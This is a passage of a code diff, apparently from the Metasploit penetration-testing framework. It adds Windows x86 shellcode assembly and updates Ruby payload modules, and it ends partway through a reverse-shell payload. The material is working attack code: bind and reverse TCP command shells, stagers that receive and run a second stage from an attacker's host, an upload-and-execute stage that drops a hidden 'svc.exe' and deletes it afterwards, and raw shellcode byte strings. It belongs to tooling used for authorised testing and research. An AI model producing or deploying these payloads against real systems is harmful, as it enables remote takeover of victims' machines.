for h in collisions_detected.keys():
|
||||
for (col_hash, col_name ) in collisions:
|
||||
if h == col_hash:
|
||||
detected_name = col_name
|
||||
break
|
||||
print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
|
||||
for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
|
||||
print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
|
||||
print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
|
||||
else:
|
||||
print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "/dir":
|
||||
print "[+] Scanning directory '%s' for collisions..." % argv[2]
|
||||
scan_directory( argv[2] )
|
||||
elif argv[1] == "/mod":
|
||||
print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
|
||||
scan( argv[2], argv[3], print_hashes=True )
|
||||
else:
|
||||
hash( argv[1], argv[2] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
26
external/source/shellcode/windows/x86/src/single/single_exec.asm
vendored
Normal file
26
external/source/shellcode/windows/x86/src/single/single_exec.asm
vendored
Normal file
@ -0,0 +1,26 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 191 bytes + strlen(command) + 1
|
||||
; Build: >build.py single_exec
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm" ;
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
push byte +1 ;
|
||||
lea eax, [ebp+command-delta]
|
||||
push eax ;
|
||||
push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
|
||||
call ebp ; WinExec( &command, 1 );
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
||||
command:
|
||||
;db "calc.exe", 0
|
20
external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm
vendored
Normal file
20
external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm
vendored
Normal file
@ -0,0 +1,20 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 341 bytes
|
||||
; Build: >build.py single_shell_bind_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
vendored
Normal file
20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
vendored
Normal file
@ -0,0 +1,20 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 314 bytes
|
||||
; Build: >build.py single_shell_reverse_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
22
external/source/shellcode/windows/x86/src/stage/stage_shell.asm
vendored
Normal file
22
external/source/shellcode/windows/x86/src/stage/stage_shell.asm
vendored
Normal file
@ -0,0 +1,22 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 240 bytes
|
||||
; Build: >build.py stage_shell
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Perform the call to our EXITFUNC.
|
||||
%include "./src/block/block_exitfunk.asm"
|
137
external/source/shellcode/windows/x86/src/stage/stage_upexec.asm
vendored
Normal file
137
external/source/shellcode/windows/x86/src/stage/stage_upexec.asm
vendored
Normal file
@ -0,0 +1,137 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 398 bytes
|
||||
; Build: >build.py stage_upexec
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
; create a file in a temp dir...
|
||||
push byte 127 ; Push down 127
|
||||
pop eax ; And pop it into EAX
|
||||
shl eax, 3 ; Shift EAX left by 3 so it = 1016
|
||||
sub esp, eax ; Alloc this space on the stack for the temp file path + name
|
||||
push esp ; Push the buffer address
|
||||
push eax ; Push the buffer size (127 * 4 = 508)
|
||||
push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
|
||||
call ebp ; GetTempPathA( 1016, &buffer );
|
||||
lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
|
||||
mov dword [eax+0], 0x2E637673 ; Append the file name...
|
||||
mov dword [eax+4], 0x00657865 ; 'svc.exe',0
|
||||
; Create the file...
|
||||
mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
|
||||
push eax ; save the pointer to the file path for later
|
||||
push byte 0 ; We dont specify a template file handle
|
||||
push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
|
||||
push byte 2 ; The Creation Disposition: CREATE_ALWAYS
|
||||
push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
|
||||
push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
|
||||
push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
|
||||
push eax ; The name of the file to create
|
||||
push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
|
||||
call ebp ; CreateFileA( ... );
|
||||
mov ebx, eax ; EBX = the new file handle
|
||||
; Receive the size of the incoming file...
|
||||
push esp ; Alloc a dword for the recv buffer param
|
||||
mov esi, esp ; Save pointer
|
||||
push byte 0 ; Flags
|
||||
push byte 4 ; Length = sizeof( DWORD );
|
||||
push esi ; The 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RW buffer for the incoming file...
|
||||
mov esi, [esi] ; Dereference the pointer to the second stage length
|
||||
push byte 0x04 ; PAGE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; Push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
|
||||
push ebx ; Save the file handle for later call to CloseHandle
|
||||
; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
|
||||
push ebx ; Alloc a dword for the bytes written param
|
||||
mov ecx, esp ; Save this address
|
||||
push byte 0 ; null as we dont set an overlapped param
|
||||
push ecx ; Pointer to the number of bytes written output param
|
||||
push esi ; Push the buffer length
|
||||
push eax ; Push the newly allocated RW buffer
|
||||
push ebx ; Push the hFile param
|
||||
mov ebx, eax ; EBX = our new memory address for the incoming file
|
||||
; read in the incoming file...
|
||||
read_more: ;
|
||||
push byte 0 ; Flags
|
||||
push esi ; Length
|
||||
push ebx ; The current address into our incoming files RW buffer
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; Test length
|
||||
jnz read_more ; Continue if we have more to read
|
||||
; write the entire files buffer to disk...
|
||||
push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
|
||||
call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
|
||||
pop ecx ; Restore esp to the correct location for the next call
|
||||
; close the file handle, we dont need to push the handle as it is allready pushed onto stack
|
||||
push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
|
||||
call ebp ; CloseHandle( hFile );
|
||||
; execute the file...
|
||||
push edi ; Our socket becomes the processes hStdError
|
||||
push edi ; Our socket becomes the processes hStdOutput
|
||||
push edi ; Our socket becomes the processes hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop2: ;
|
||||
push esi ; Push a null dword
|
||||
loop push_loop2 ; Keep looping untill we have pushed enough nulls
|
||||
mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; Push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
; close the socket...
|
||||
push edi ; Push the socket to close
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
; delete the file...
|
||||
push dword [esp+88] ; Push the saved pointer to the file path
|
||||
push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
|
||||
call ebp ; DeleteFileA( &file );
|
||||
; finish up with the EXITFUNK
|
||||
%include "./src/block/block_exitfunk.asm"
|
19
external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm
vendored
Normal file
19
external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm
vendored
Normal file
@ -0,0 +1,19 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 301 bytes
|
||||
; Build: >build.py stager_bind_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
20
external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
vendored
Normal file
20
external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
vendored
Normal file
@ -0,0 +1,20 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 274 bytes
|
||||
; Build: >build.py stager_reverse_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
@ -15,9 +15,9 @@ module Msf::Payload::Windows
|
||||
#
|
||||
@@exit_types =
|
||||
{
|
||||
'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x60e0ceef, # ExitThread
|
||||
'process' => 0x73e2d87e, # ExitProcess
|
||||
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x0A2A1DE0, # ExitThread
|
||||
'process' => 0x56A2B5F0, # ExitProcess
|
||||
}
|
||||
|
||||
#
|
||||
@ -64,6 +64,13 @@ module Msf::Payload::Windows
|
||||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
if( self.module_info['Stager']['RequiresMidstager'] == false )
|
||||
conn.put( [ payload.length ].pack('V') )
|
||||
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
|
||||
return false
|
||||
end
|
||||
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
@ -5,6 +9,7 @@ module Msf
|
||||
# Common command execution implementation for Windows.
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::Exec
|
||||
|
||||
include Msf::Payload::Windows
|
||||
@ -15,7 +20,7 @@ module Payload::Windows::Exec
|
||||
'Name' => 'Windows Execute Command',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Execute an arbitrary command',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -23,16 +28,20 @@ module Payload::Windows::Exec
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 100, 'V' ]
|
||||
'EXITFUNC' => [ 161, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +
|
||||
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +
|
||||
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" +
|
||||
"\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" +
|
||||
"\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
|
||||
"\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
|
||||
"\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
|
@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
|
||||
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
|
||||
"\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
|
||||
"\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
|
||||
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
|
||||
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell, Bind TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -34,38 +34,31 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 162, 'n' ],
|
||||
'EXITFUNC' => [ 308, 'V' ],
|
||||
'LPORT' => [ 201, 'n' ],
|
||||
'EXITFUNC' => [ 311, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
|
||||
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
|
||||
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
|
||||
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
|
||||
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
|
||||
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
|
||||
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
|
||||
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
|
||||
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
|
||||
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
|
||||
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
|
||||
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
|
||||
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
|
||||
"\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
|
||||
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
|
||||
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
|
||||
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
|
||||
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
|
||||
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
|
||||
"\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -77,5 +77,18 @@ module Metasploit3
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell, Reverse TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -34,36 +34,30 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 166, 'n' ],
|
||||
'LHOST' => [ 160, 'ADDR' ],
|
||||
'EXITFUNC' => [ 278, 'V' ],
|
||||
'LPORT' => [ 203, 'n' ],
|
||||
'LHOST' => [ 196, 'ADDR' ],
|
||||
'EXITFUNC' => [ 284, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
